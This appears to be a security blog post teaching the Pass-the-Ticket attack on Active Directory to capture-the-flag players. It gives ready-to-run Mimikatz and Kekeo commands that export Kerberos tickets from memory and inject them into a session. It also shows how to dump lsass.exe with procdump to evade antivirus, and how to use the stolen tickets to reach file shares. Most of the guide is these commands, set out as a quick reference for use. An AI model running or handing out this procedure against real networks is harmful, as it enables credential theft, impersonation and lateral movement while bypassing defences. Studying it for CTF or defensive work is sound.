Pass the Ticket: An AD Attack Method

Exploitation
ToxSec

Pass the Ticket: An AD Attack Method

Pass-the-Ticket (PtT) is a popular method of attack in AD environments, capitalizing on Kerberos tickets to gain unauthorized access. This guide breaks down PtT for the active CTF player, offering actionable code and clear steps to execute under time pressure.

PtT Basics

In Kerberos authentication, tickets, rather than passwords, grant access to resources. If an attacker can obtain and reuse a valid ticket, they can impersonate the associated user without needing their password. This action is the essence of the PtT attack.

Essential Tools:

  • Mimikatz: Central to extracting and using Kerberos tickets.
  • Kekeo: Another toolkit for Kerberos-related attacks.

Quickfire PtT Guide

Before you can pass a ticket, you need to have a ticket:

# Using Mimikatz to extract TGTs
sekurlsa::tickets /export

This will extract all Kerberos tickets from memory. Tickets can be of two types: Ticket Granting Tickets (TGTs) and Service Tickets (TGS).

Inject the Ticket

With a ticket in hand (often a .kirbi file), it’s time to inject it into your session:

# Using Mimikatz to inject the ticket
kerberos::ptt ticket_name.kirbi

Access Resources:

After injection, you can access resources as the user associated with the ticket:

# Accessing a file share, for example
net use \\target_machine\share

Advanced Tips

Stealthy Extraction with Procdump: Anti-virus solutions might detect and block Mimikatz. To bypass this:

Dump the memory of the lsass.exe process using Sysinternals procdump:

procdump -ma lsass.exe lsass.dmp

Use Mimikatz offline to extract tickets from the dump:

sekurlsa::tickets /export /minidump:lsass.dmp

Remote Ticket Use with Kekeo: If you wish to use the ticket from another machine or share it with a teammate:

Export your ticket:

klist export tgt_klist_name /outfile:ticket_name.kirbi

Transfer the .kirbi file to the desired machine.

Inject with Kekeo:

kekeo.exe tgt::ptt /ticket:ticket_name.kirbi

Quick Reference

Extracting tickets:

sekurlsa::tickets /export

Injecting tickets:

kerberos::ptt ticket_name.kirbi

Accessing resources post-injection:

net use \\target_machine\share

Conclusion

The PtT attack showcases the power of Kerberos tickets when in the wrong hands. For CTF players, mastering this technique provides a potent tool during challenges. Remember, understanding the attack not only equips you offensively but strengthens your defensive playbook. Always use this knowledge responsibly and ethically during competitions.

Related Posts

Back To Top